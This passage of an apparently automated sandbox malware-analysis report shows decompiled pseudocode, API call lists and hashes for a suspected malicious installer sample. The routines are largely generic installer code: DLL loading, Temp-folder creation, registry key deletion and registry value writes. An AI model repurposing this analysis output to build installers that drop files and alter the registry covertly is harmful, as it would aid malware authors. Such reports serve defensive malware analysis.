                                                                                                                          				if(_t13 > 0x104) {
                                                                                                                          					_t13 = 0;
                                                                                                                          				}
                                                                                                                          				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                                                          					_t19 = 1;
                                                                                                                          				} else {
                                                                                                                          					_t19 = 0;
                                                                                                                          				}
                                                                                                                          				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                                                          				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                                                          				return _t17;
                                                                                                                          			}








                                                                                                                          0x004069dc
                                                                                                                          0x004069e5
                                                                                                                          0x004069e7
                                                                                                                          0x004069e7
                                                                                                                          0x004069eb
                                                                                                                          0x004069fe
                                                                                                                          0x004069f8
                                                                                                                          0x004069f8
                                                                                                                          0x004069f8
                                                                                                                          0x00406a17
                                                                                                                          0x00406a2b
                                                                                                                          0x00406a32

                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                          • wsprintfW.USER32 ref: 00406A17
                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                          • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                          • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                                                          • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                          • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 657 405b99-405be4 CreateDirectoryW 658 405be6-405be8 657->658 659 405bea-405bf7 GetLastError 657->659 660 405c11-405c13 658->660 659->660 661 405bf9-405c0d SetFileSecurityW 659->661 661->658 662 405c0f GetLastError 661->662 662->660
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405B99(WCHAR* _a4) {
                                                                                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                          				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                          				int _t22;
                                                                                                                          				long _t23;
                                                                                                                          
                                                                                                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                          				_v36.Owner = 0x4083f8;
                                                                                                                          				_v36.Group = 0x4083f8;
                                                                                                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                          				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                          				_v36.Revision = 1;
                                                                                                                          				_v36.Control = 4;
                                                                                                                          				_v36.Dacl = 0x4083e8;
                                                                                                                          				_v16.nLength = 0xc;
                                                                                                                          				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                                                          				if(_t22 != 0) {
                                                                                                                          					L1:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t23 = GetLastError();
                                                                                                                          				if(_t23 == 0xb7) {
                                                                                                                          					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					return GetLastError();
                                                                                                                          				}
                                                                                                                          				return _t23;
                                                                                                                          			}







                                                                                                                          0x00405ba4
                                                                                                                          0x00405ba8
                                                                                                                          0x00405bab
                                                                                                                          0x00405bb1
                                                                                                                          0x00405bb5
                                                                                                                          0x00405bb9
                                                                                                                          0x00405bc1
                                                                                                                          0x00405bc8
                                                                                                                          0x00405bce
                                                                                                                          0x00405bd5
                                                                                                                          0x00405bdc
                                                                                                                          0x00405be4
                                                                                                                          0x00405be6
                                                                                                                          0x00000000
                                                                                                                          0x00405be6
                                                                                                                          0x00405bf0
                                                                                                                          0x00405bf7
                                                                                                                          0x00405c0d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405c0f
                                                                                                                          0x00405c13

                                                                                                                          APIs
                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                          • GetLastError.KERNEL32 ref: 00405BF0
                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                                                          • GetLastError.KERNEL32 ref: 00405C0F
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 3449924974-3355392842
                                                                                                                          • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                          • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                                                          • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                          • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 663 402ea9-402ed2 call 4064d5 665 402ed7-402edb 663->665 666 402ee1-402ee5 665->666 667 402f8c-402f90 665->667 668 402ee7-402f08 RegEnumValueW 666->668 669 402f0a-402f1d 666->669 668->669 670 402f71-402f7f RegCloseKey 668->670 671 402f46-402f4d RegEnumKeyW 669->671 670->667 672 402f1f-402f21 671->672 673 402f4f-402f61 RegCloseKey call 406a35 671->673 672->670 674 402f23-402f37 call 402ea9 672->674 679 402f81-402f87 673->679 680 402f63-402f6f RegDeleteKeyW 673->680 674->673 681 402f39-402f45 674->681 679->667 680->667 681->671
                                                                                                                          C-Code - Quality: 48%
                                                                                                                          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                                                          				void* _v8;
                                                                                                                          				int _v12;
                                                                                                                          				short _v536;
                                                                                                                          				void* _t27;
                                                                                                                          				signed int _t33;
                                                                                                                          				intOrPtr* _t35;
                                                                                                                          				signed int _t45;
                                                                                                                          				signed int _t46;
                                                                                                                          				signed int _t47;
                                                                                                                          
                                                                                                                          				_t46 = _a12;
                                                                                                                          				_t47 = _t46 & 0x00000300;
                                                                                                                          				_t45 = _t46 & 0x00000001;
                                                                                                                          				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                                                                                          				if(_t27 == 0) {
                                                                                                                          					if((_a12 & 0x00000002) == 0) {
                                                                                                                          						L3:
                                                                                                                          						_push(0x105);
                                                                                                                          						_push( &_v536);
                                                                                                                          						_push(0);
                                                                                                                          						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                                                          							__eflags = _t45;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								L10:
                                                                                                                          								RegCloseKey(_v8);
                                                                                                                          								return 0x3eb;
                                                                                                                          							}
                                                                                                                          							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                                                          							__eflags = _t33;
                                                                                                                          							if(_t33 != 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_push(0x105);
                                                                                                                          							_push( &_v536);
                                                                                                                          							_push(_t45);
                                                                                                                          						}
                                                                                                                          						RegCloseKey(_v8);
                                                                                                                          						_t35 = E00406A35(3);
                                                                                                                          						if(_t35 != 0) {
                                                                                                                          							return  *_t35(_a4, _a8, _t47, 0);
                                                                                                                          						}
                                                                                                                          						return RegDeleteKeyW(_a4, _a8);
                                                                                                                          					}
                                                                                                                          					_v12 = 0;
                                                                                                                          					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                                                          						goto L10;
                                                                                                                          					}
                                                                                                                          					goto L3;
                                                                                                                          				}
                                                                                                                          				return _t27;
                                                                                                                          			}












                                                                                                                          0x00402eb4
                                                                                                                          0x00402ebd
                                                                                                                          0x00402ec6
                                                                                                                          0x00402ed2
                                                                                                                          0x00402edb
                                                                                                                          0x00402ee5
                                                                                                                          0x00402f0a
                                                                                                                          0x00402f10
                                                                                                                          0x00402f15
                                                                                                                          0x00402f16
                                                                                                                          0x00402f46
                                                                                                                          0x00402f1f
                                                                                                                          0x00402f21
                                                                                                                          0x00402f71
                                                                                                                          0x00402f74
                                                                                                                          0x00000000
                                                                                                                          0x00402f7a
                                                                                                                          0x00402f30
                                                                                                                          0x00402f35
                                                                                                                          0x00402f37
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402f3f
                                                                                                                          0x00402f44
                                                                                                                          0x00402f45
                                                                                                                          0x00402f45
                                                                                                                          0x00402f52
                                                                                                                          0x00402f5a
                                                                                                                          0x00402f61
                                                                                                                          0x00000000
                                                                                                                          0x00402f8a
                                                                                                                          0x00000000
                                                                                                                          0x00402f69
                                                                                                                          0x00402ef5
                                                                                                                          0x00402f08
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402f08
                                                                                                                          0x00402f90

                                                                                                                          APIs
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnum$DeleteValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1354259210-0
                                                                                                                          • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                                                          • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                                                          • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                                                          • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 682 71461817-71461856 call 71461bff 686 71461976-71461978 682->686 687 7146185c-71461860 682->687 688 71461862-71461868 call 7146243e 687->688 689 71461869-71461876 call 71462480 687->689 688->689 694 714618a6-714618ad 689->694 695 71461878-7146187d 689->695 696 714618af-714618cb call 71462655 call 71461654 call 71461312 GlobalFree 694->696 697 714618cd-714618d1 694->697 698 7146187f-71461880 695->698 699 71461898-7146189b 695->699 722 71461925-71461929 696->722 700 714618d3-7146191c call 71461666 call 71462655 697->700 701 7146191e-71461924 call 71462655 697->701 704 71461882-71461883 698->704 705 71461888-71461889 call 71462b98 698->705 699->694 702 7146189d-7146189e call 71462e23 699->702 700->722 701->722 716 714618a3 702->716 710 71461885-71461886 704->710 711 71461890-71461896 call 71462810 704->711 713 7146188e 705->713 710->694 710->705 721 714618a5 711->721 713->716 716->721 721->694 725 71461966-7146196d 722->725 726 7146192b-71461939 call 71462618 722->726 725->686 729 7146196f-71461970 GlobalFree 725->729 732 71461951-71461958 726->732 733 7146193b-7146193e 726->733 729->686 732->725 734 7146195a-71461965 call 714615dd 732->734 733->732 735 71461940-71461948 733->735 734->725 735->732 736 7146194a-7146194b FreeLibrary 735->736 736->732
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E71461817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                          				void _v36;
                                                                                                                          				char _v136;
                                                                                                                          				struct HINSTANCE__* _t37;
                                                                                                                          				intOrPtr _t42;
                                                                                                                          				void* _t48;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t50;
                                                                                                                          				void* _t54;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				signed int _t61;
                                                                                                                          				signed int _t63;
                                                                                                                          				void* _t67;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t76;
                                                                                                                          
                                                                                                                          				_t76 = __esi;
                                                                                                                          				_t68 = __edi;
                                                                                                                          				_t67 = __edx;
                                                                                                                          				 *0x7146506c = _a8;
                                                                                                                          				 *0x71465070 = _a16;
                                                                                                                          				 *0x71465074 = _a12;
                                                                                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x71465048, E71461651);
                                                                                                                          				_push(1);
                                                                                                                          				_t37 = E71461BFF();
                                                                                                                          				_t54 = _t37;
                                                                                                                          				if(_t54 == 0) {
                                                                                                                          					L28:
                                                                                                                          					return _t37;
                                                                                                                          				} else {
                                                                                                                          					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                          						E7146243E(_t54);
                                                                                                                          					}
                                                                                                                          					_push(_t54);
                                                                                                                          					E71462480(_t67);
                                                                                                                          					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                          					if(_t57 == 0xffffffff) {
                                                                                                                          						L14:
                                                                                                                          						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                                                          							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                                                          								_push(_t54);
                                                                                                                          								_t37 = E71462655();
                                                                                                                          							} else {
                                                                                                                          								_push(_t76);
                                                                                                                          								_push(_t68);
                                                                                                                          								_t61 = 8;
                                                                                                                          								_t13 = _t54 + 0x1018; // 0x1018
                                                                                                                          								memcpy( &_v36, _t13, _t61 << 2);
                                                                                                                          								_t42 = E71461666(_t54,  &_v136);
                                                                                                                          								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                                                          								_t18 = _t54 + 0x1018; // 0x1018
                                                                                                                          								_t72 = _t18;
                                                                                                                          								_push(_t54);
                                                                                                                          								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                                                          								 *_t72 = 4;
                                                                                                                          								E71462655();
                                                                                                                          								_t63 = 8;
                                                                                                                          								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							_push(_t54);
                                                                                                                          							E71462655();
                                                                                                                          							_t37 = GlobalFree(E71461312(E71461654(_t54)));
                                                                                                                          						}
                                                                                                                          						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                          							_t37 = E71462618(_t54);
                                                                                                                          							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                                                          								_t37 =  *(_t54 + 0x1008);
                                                                                                                          								if(_t37 != 0) {
                                                                                                                          									_t37 = FreeLibrary(_t37);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                                                          								_t37 = E714615DD( *0x71465068);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                                                          							goto L28;
                                                                                                                          						} else {
                                                                                                                          							return GlobalFree(_t54);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t48 =  *_t54;
                                                                                                                          					if(_t48 == 0) {
                                                                                                                          						if(_t57 != 1) {
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          						E71462E23(_t54);
                                                                                                                          						L12:
                                                                                                                          						_t54 = _t48;
                                                                                                                          						L13:
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          					_t49 = _t48 - 1;
                                                                                                                          					if(_t49 == 0) {
                                                                                                                          						L8:
                                                                                                                          						_t48 = E71462B98(_t57, _t54); // executed
                                                                                                                          						goto L12;
                                                                                                                          					}
                                                                                                                          					_t50 = _t49 - 1;
                                                                                                                          					if(_t50 == 0) {
                                                                                                                          						E71462810(_t54);
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					if(_t50 != 1) {
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          					goto L8;
                                                                                                                          				}
                                                                                                                          			}


















                                                                                                                          0x71461817
                                                                                                                          0x71461817
                                                                                                                          0x71461817
                                                                                                                          0x71461824
                                                                                                                          0x7146182c
                                                                                                                          0x71461839
                                                                                                                          0x71461847
                                                                                                                          0x7146184a
                                                                                                                          0x7146184c
                                                                                                                          0x71461851
                                                                                                                          0x71461856
                                                                                                                          0x71461978
                                                                                                                          0x71461978
                                                                                                                          0x7146185c
                                                                                                                          0x71461860
                                                                                                                          0x71461863
                                                                                                                          0x71461868
                                                                                                                          0x71461869
                                                                                                                          0x7146186a
                                                                                                                          0x71461870
                                                                                                                          0x71461876
                                                                                                                          0x714618a6
                                                                                                                          0x714618ad
                                                                                                                          0x714618d1
                                                                                                                          0x7146191e
                                                                                                                          0x7146191f
                                                                                                                          0x714618d3
                                                                                                                          0x714618d3
                                                                                                                          0x714618d4
                                                                                                                          0x714618dd
                                                                                                                          0x714618de
                                                                                                                          0x714618e8
                                                                                                                          0x714618eb
                                                                                                                          0x714618f0
                                                                                                                          0x714618f7
                                                                                                                          0x714618f7
                                                                                                                          0x714618fd
                                                                                                                          0x714618fe
                                                                                                                          0x71461904
                                                                                                                          0x7146190a
                                                                                                                          0x71461917
                                                                                                                          0x71461918
                                                                                                                          0x7146191b
                                                                                                                          0x714618af
                                                                                                                          0x714618af
                                                                                                                          0x714618b0
                                                                                                                          0x714618c5
                                                                                                                          0x714618c5
                                                                                                                          0x71461929
                                                                                                                          0x7146192c
                                                                                                                          0x71461939
                                                                                                                          0x71461940
                                                                                                                          0x71461948
                                                                                                                          0x7146194b
                                                                                                                          0x7146194b
                                                                                                                          0x71461948
                                                                                                                          0x71461958
                                                                                                                          0x71461960
                                                                                                                          0x71461965
                                                                                                                          0x71461958
                                                                                                                          0x7146196d
                                                                                                                          0x00000000
                                                                                                                          0x7146196f
                                                                                                                          0x00000000
                                                                                                                          0x71461970
                                                                                                                          0x7146196d
                                                                                                                          0x7146187a
                                                                                                                          0x7146187d
                                                                                                                          0x7146189b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x7146189e
                                                                                                                          0x714618a3
                                                                                                                          0x714618a3
                                                                                                                          0x714618a5
                                                                                                                          0x00000000
                                                                                                                          0x714618a5
                                                                                                                          0x7146187f
                                                                                                                          0x71461880
                                                                                                                          0x71461888
                                                                                                                          0x71461889
                                                                                                                          0x00000000
                                                                                                                          0x71461889
                                                                                                                          0x71461882
                                                                                                                          0x71461883
                                                                                                                          0x71461891
                                                                                                                          0x00000000
                                                                                                                          0x71461891
                                                                                                                          0x71461886
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461886

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 71461BFF: GlobalFree.KERNEL32(?), ref: 71461E74
                                                                                                                            • Part of subcall function 71461BFF: GlobalFree.KERNEL32(?), ref: 71461E79
                                                                                                                            • Part of subcall function 71461BFF: GlobalFree.KERNEL32(?), ref: 71461E7E
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 714618C5
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 7146194B
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 71461970
                                                                                                                            • Part of subcall function 7146243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7146246F
                                                                                                                            • Part of subcall function 71462810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71461896,00000000), ref: 714628E0
                                                                                                                            • Part of subcall function 71461666: wsprintfW.USER32 ref: 71461694
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33069504467.0000000071461000.00000020.00000001.01000000.00000005.sdmp, Offset: 71460000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33069452109.0000000071460000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069570468.0000000071464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069617155.0000000071466000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_71460000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3962662361-3916222277
                                                                                                                          • Opcode ID: 02aab590041aae97f22c17581ea1c61bab8cd6e473325c4a2b5f5fefb3861805
                                                                                                                          • Instruction ID: a43bb8835877477c6ee4e7b901265d3c8e4895537293dd3c95e2c2a645f5a12c
                                                                                                                          • Opcode Fuzzy Hash: 02aab590041aae97f22c17581ea1c61bab8cd6e473325c4a2b5f5fefb3861805
                                                                                                                          • Instruction Fuzzy Hash: 9141F7B2904242ABEB019F34D888F853BBCBF55B5CF144479ED4BAE196DB74C488C7A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 739 40248a-4024bb call 402da6 * 2 call 402e36 746 4024c1-4024cb 739->746 747 402c2a-402c39 739->747 749 4024cd-4024da call 402da6 lstrlenW 746->749 750 4024de-4024e1 746->750 749->750 751 4024e3-4024f4 call 402d84 750->751 752 4024f5-4024f8 750->752 751->752 756 402509-40251d RegSetValueExW 752->756 757 4024fa-402504 call 403371 752->757 761 402522-402603 RegCloseKey 756->761 762 40251f 756->762 757->756 761->747 762->761
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                                                                          				void* _t20;
                                                                                                                          				void* _t21;
                                                                                                                          				int _t24;
                                                                                                                          				long _t25;
                                                                                                                          				char _t27;
                                                                                                                          				int _t30;
                                                                                                                          				void* _t32;
                                                                                                                          				intOrPtr _t33;
                                                                                                                          				void* _t34;
                                                                                                                          				intOrPtr _t37;
                                                                                                                          				void* _t39;
                                                                                                                          				void* _t42;
                                                                                                                          
                                                                                                                          				_t42 = __eflags;
                                                                                                                          				_t33 = __edx;
                                                                                                                          				_t30 = __ebx;
                                                                                                                          				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                                                          				_t34 = __eax;
                                                                                                                          				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                                                          				 *(_t39 - 0x44) = E00402DA6(2);
                                                                                                                          				_t20 = E00402DA6(0x11);
                                                                                                                          				 *(_t39 - 4) = 1;
                                                                                                                          				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                                                                                          				 *(_t39 + 8) = _t21;
                                                                                                                          				if(_t21 != __ebx) {
                                                                                                                          					_t24 = 0;
                                                                                                                          					if(_t37 == 1) {
                                                                                                                          						E00402DA6(0x23);
                                                                                                                          						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
                                                                                                                          					}
                                                                                                                          					if(_t37 == 4) {
                                                                                                                          						_t27 = E00402D84(3);
                                                                                                                          						_pop(_t32);
                                                                                                                          						 *0x40b5f8 = _t27;
                                                                                                                          						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                                                          						_t24 = _t37;
                                                                                                                          					}
                                                                                                                          					if(_t37 == 3) {
                                                                                                                          						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800); // executed
                                                                                                                          					}
                                                                                                                          					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24); // executed
                                                                                                                          					if(_t25 == 0) {
                                                                                                                          						 *(_t39 - 4) = _t30;
                                                                                                                          					}
                                                                                                                          					_push( *(_t39 + 8));
                                                                                                                          					RegCloseKey(); // executed
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                                                          				return 0;
                                                                                                                          			}















                                                                                                                          0x0040248a
                                                                                                                          0x0040248a
                                                                                                                          0x0040248a
                                                                                                                          0x0040248a
                                                                                                                          0x0040248d
                                                                                                                          0x00402494
                                                                                                                          0x0040249e
                                                                                                                          0x004024a1
                                                                                                                          0x004024aa
                                                                                                                          0x004024b1
                                                                                                                          0x004024b8
                                                                                                                          0x004024bb
                                                                                                                          0x004024c1
                                                                                                                          0x004024cb
                                                                                                                          0x004024cf
                                                                                                                          0x004024da
                                                                                                                          0x004024da
                                                                                                                          0x004024e1
                                                                                                                          0x004024e5
                                                                                                                          0x004024ea
                                                                                                                          0x004024eb
                                                                                                                          0x004024f1
                                                                                                                          0x004024f4
                                                                                                                          0x004024f4
                                                                                                                          0x004024f8
                                                                                                                          0x00402504
                                                                                                                          0x00402504
                                                                                                                          0x00402515
                                                                                                                          0x0040251d
                                                                                                                          0x0040251f
                                                                                                                          0x0040251f
                                                                                                                          0x00402522
                                                                                                                          0x004025fd
                                                                                                                          0x004025fd
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxD40A.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsxD40A.tmp,00000000,00000011,00000002), ref: 00402515
